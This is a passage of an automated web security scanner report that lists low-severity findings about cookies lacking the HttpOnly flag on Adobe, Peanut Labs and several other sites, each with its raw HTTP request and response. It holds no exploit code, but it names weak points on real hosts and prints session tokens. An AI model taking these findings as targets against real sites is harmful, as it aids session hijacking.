HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:22 GMT Server: JRun Web Server Set-Cookie: CFID=7126392;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/ Set-Cookie: CFTOKEN=132e3b7190093aee Set-Cookie: DYLANSESSIONID=48306 Set-Cookie: UID=1C5C2077%2D9490 Set-Cookie: CFAUTHORIZATION_adobe_com Environment: webapp-da1-02.corp.adobe Content-Language: en-US Content-Language: en-US Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Set-Cookie: DylanApp-BigIP=223114250 Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.8. http://www.adobe.com/cfusion/marketplace/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/marketplace |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=6727968;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/
- CFTOKEN=b3b6fb7bf15b5dba
-1C5DBC63-0270-1BAD -1AB71BB1FC329068;expires =Tue, 01-Jan-2041 05:25:32 GMT;path=/ - DYLANSESSIONID=4830c
fe6058d4297cda07d4b6 57e334c4d4b;path=/ - UID=1C5DBCC0%2DAF9A
%2D535E%2D2CEE49CDAB EF82D1;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/cfusion/ - DylanApp-BigIP=877425674
.24610.0000; path=/
Request
GET /cfusion/marketplace Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:32 GMT Server: JRun Web Server Set-Cookie: CFID=6727968;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/ Set-Cookie: CFTOKEN=b3b6fb7bf15b5dba Set-Cookie: DYLANSESSIONID=4830c Set-Cookie: UID=1C5DBCC0%2DAF9A Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-11.corp.adobe Content-Language: en-US Content-Language: en-US Set-Cookie: DylanApp-BigIP=877425674 Connection: close Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <he ...[SNIP]... |
10.9. http://www.adobe.com/cfusion/membership/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/membership/index |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=6659512;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/
- CFTOKEN=f4347a9052ead450
-1C5A13B4-FB54-F217 -4F00E67240D7B5AD;expires =Tue, 01-Jan-2041 05:25:08 GMT;path=/ - DYLANSESSIONID=48309
3c2ba6274c2472f7e538 4a3d1d576f6;path=/ - UID=1C5A140F%2DD895
%2D113E%2D36E6ED9503 82D262;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/cfusion/ - DylanApp-BigIP=877425674
.13345.0000; path=/
Request
GET /cfusion/membership/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:08 GMT Server: JRun Web Server Set-Cookie: CFID=6659512;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/ Set-Cookie: CFTOKEN=f4347a9052ead450 Set-Cookie: DYLANSESSIONID=48309 Set-Cookie: UID=1C5A140F%2DD895 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: false Environment: webapp-da1-11.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=877425674 Content-Length: 0 Connection: close |
10.10. http://www.adobe.com/cfusion/membership/logout.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/membership |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7115771;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/
- CFTOKEN=802706847268b08f
-1C5A9C66-D18B-0210 -A596AFF349468AB8;expires =Tue, 01-Jan-2041 05:25:12 GMT;path=/ - DYLANSESSIONID=48301
f6e250b10ed162b5e671 33466408062;path=/ - UID=1C5A9C8D%2DB2A1
%2D7B91%2D5082B84980 5CBB1C;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/cfusion/ - DylanApp-BigIP=1179415562
.24610.0000; path=/
Request
GET /cfusion/membership Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:12 GMT Server: JRun Web Server Set-Cookie: CFID=7115771;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/ Set-Cookie: CFTOKEN=802706847268b08f Set-Cookie: DYLANSESSIONID=48301 Set-Cookie: UID=1C5A9C8D%2DB2A1 Set-Cookie: CFAUTHORIZATION_adobe_com Set-Cookie: CFAUTHORIZATION_adobe_com Set-Cookie: RMID=;domain=.adobe.com Set-Cookie: SCREENNAME=;domain=.adobe Set-Cookie: AUID=;domain=.adobe.com Set-Cookie: MM_ESD=;domain=.adobe.com Set-Cookie: MM_TRIALS=;domain=.adobe Set-Cookie: ADC_MEMBER=;domain=.adobe Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: false Environment: webapp-da1-04.corp.adobe Content-Language: en-US Content-Language: en-US location: / Set-Cookie: DylanApp-BigIP=1179415562 Connection: close Vary: Accept-Encoding, User-Agent <html> <head> <title>Macromedia logout</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> |
10.11. http://www.adobe.com/cfusion/partnerportal/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/partnerportal |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7115774;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/
- CFTOKEN=bf6594358230f035
-1C5BD289-F861-53E7 -EF47F0828906ED0C;expires =Tue, 01-Jan-2041 05:25:20 GMT;path=/ - DYLANSESSIONID=4830d
5f3e3edde0152215310b 371d617445b;path=/ - UID=1C5BD2B1%2DB643
%2D8F26%2D79D72DC963 592023;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/cfusion/ - DylanApp-BigIP=1179415562
.24610.0000; path=/
Request
GET /cfusion/partnerportal Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:20 GMT Server: JRun Web Server Set-Cookie: CFID=7115774;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/ Set-Cookie: CFTOKEN=bf6594358230f035 Set-Cookie: DYLANSESSIONID=4830d Set-Cookie: UID=1C5BD2B1%2DB643 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-04.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=1179415562 Content-Length: 0 Connection: close |
10.12. http://www.adobe.com/cfusion/showcase/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/showcase/index |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7076697;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/
- CFTOKEN=45e90dab0cf2e0f4
-1C5FE030-9D22-1E3F -163C220229B483EB;expires =Tue, 01-Jan-2041 05:25:31 GMT;path=/ - DYLANSESSIONID=4830f
e667c0d6bf4ef251b797 27419e6f6a3;path=/ - UID=1C5FE0E3%2DBCB0
%2DEEB3%2D46E28AA62C 358F29;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/cfusion/ - DylanApp-BigIP=1095529482
.38945.0000; path=/
Request
GET /cfusion/showcase/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:27 GMT Server: JRun Web Server Set-Cookie: CFID=7076697;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/ Set-Cookie: CFTOKEN=45e90dab0cf2e0f4 Set-Cookie: DYLANSESSIONID=4830f Set-Cookie: UID=1C5FE0E3%2DBCB0 Set-Cookie: CFAUTHORIZATION_adobe_com Environment: webapp-da1-09.corp.adobe Content-Language: en-US Content-Language: en-US Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Set-Cookie: DylanApp-BigIP=1095529482 Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML xmlns="http://www.w3.org ...[SNIP]... |
10.13. http://www.adobe.com/cfusion/store/html/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/store/html/index |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7135066;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/
- CFTOKEN=eca79c32bda4a00c
-1C5EDF8A-A024-3155 -A1E063E78597F2A8;expires =Tue, 01-Jan-2041 05:25:36 GMT;path=/ - DYLANSESSIONID=4830c
330b1c2e2e0675904741 70483e7e535;path=/ - UID=1C5EDFD1%2D05E9
%2D05EA%2DB2D2E9C8D3 280AAA;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/cfusion/ - DylanApp-BigIP=172782602
.24610.0000; path=/
Request
GET /cfusion/store/html/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:36 GMT Server: JRun Web Server Set-Cookie: CFID=7135066;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/ Set-Cookie: CFTOKEN=eca79c32bda4a00c Set-Cookie: DYLANSESSIONID=4830c Set-Cookie: UID=1C5EDFD1%2D05E9 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-01.corp.adobe Content-Language: en-US Content-Language: en-US location: http://store1.adobe.com Set-Cookie: DylanApp-BigIP=172782602 Content-Length: 0 Connection: close |
10.14. http://www.adobe.com/cfusion/support/index.cfm previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/support/index |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7126388;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/
- CFTOKEN=d9b8ca39e6af1b8d
-1C5AC309-AFF5-561E -C02FB9A9A70C0A84;expires =Tue, 01-Jan-2041 05:25:13 GMT;path=/ - DYLANSESSIONID=48309
1709039af2c2535f2917 7f7e63d4c5e;path=/ - UID=1C5AC330%2DA7F4
%2DF77C%2D6D6B4B0B15 9D5F71;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/cfusion/ - DylanApp-BigIP=223114250
.24610.0000; path=/
Request
GET /cfusion/support/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:13 GMT Server: JRun Web Server Set-Cookie: CFID=7126388;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/ Set-Cookie: CFTOKEN=d9b8ca39e6af1b8d Set-Cookie: DYLANSESSIONID=48309 Set-Cookie: UID=1C5AC330%2DA7F4 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-02.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=223114250 Content-Length: 0 Connection: close |
10.15. http://www.adobe.com/events/main.jsp previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /events/main.jsp |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- JSESSIONID=1c1o9aj6r4w3c
;path=/ - AWID=10.116.66.9
.1294550851826;path=/ ;domain=.adobe.com ;expires=Tue, 05-Jan-2021 21:27:31 GMT
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html x ...[SNIP]... |
10.16. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.freshnews.com |
Path: | /news/388192/peanut-labs |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- SESSdcb5af41d343fdd7
86908e4442f98f39 =dpp7pp1blldcdp337o1 5850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com
Request
GET /news/388192/peanut-labs Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:18:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Set-Cookie: SESSdcb5af41d343fdd7 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 05:18:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20877 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.17. http://www.peanutlabs.com/peanutlabs/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.peanutlabs.com |
Path: | /peanutlabs/ |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- SESSef469ce213eb8a40
5bbf25673950acca =0obr3bvubl5fq0qq2jj 04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 01:35:19 GMT Server: Apache Set-Cookie: SESSef469ce213eb8a40 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 01:35:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Location: http://www1.peanutlabs Vary: Accept-Encoding,User Content-Type: text/html; charset=utf-8 Content-Length: 0 |
10.18. http://www.peanutlabs.com/userGreeting.php previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.peanutlabs.com |
Path: | /userGreeting.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- PHPSESSID=no34gl7itt
r6r2j8nkt40st7q5; path=/; domain=.peanutlabs.com - pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com - ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
- sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com - pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_email=test4%40fastdial
.net; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Request
GET /userGreeting.php?userId Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:16 GMT Server: Apache Set-Cookie: PHPSESSID=no34gl7itt Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 31484 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... |
10.19. http://www.pixeltrack66.com/mt/w2643334g4y223/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pixeltrack66 |
Path: | /mt/w2643334g4y223/ |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- PHPSESSID=vcnvs4i5j3
pnkunpsl190rd6p6; path=/ - mt_clk=54267db83a49b
89cd0644d669488302a; path=/ - mt_lds=54267db83a49b
89cd0644d669488302a; expires=Tue, 08-Feb-2011 01:35:14 GMT; path=/
Request
GET /mt/w2643334g4y223/ HTTP/1.1 Host: www.pixeltrack66.com Proxy-Connection: keep-alive Referer: http://content.yield Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 01:35:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Set-Cookie: PHPSESSID=vcnvs4i5j3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_clk=54267db83a49b Set-Cookie: mt_lds=54267db83a49b Location: http://www.theiq-quiz.com Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
10.20. http://www.thedailynews.cc/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.thedailynews |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- ASPSESSIONIDSASAASQB
=KCNAOIEADCPKOCPKACDIKMJH ; path=/ - UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Request
GET / HTTP/1.1 Host: www.thedailynews.cc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:20:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 08 Jan 2011 01:20:38 GMT Set-Cookie: UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSASAASQB Cache-control: private <!-- Begin: 1/8/2011 8:20:38 PM --><html> <head> <META HTTP-EQUIV="Expires" CONTENT="0"> <META NAME="GENERATOR" Content=" 1up! Software ( www.going1up.com ) News Site Software 5.5"> <META NA ...[SNIP]... |
10.21. http://ad.doubleclick.net/click previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /click |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- id=c653243310000d9
|2070351/902302/14983|t =1294099968|et=730|cs =gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
Request
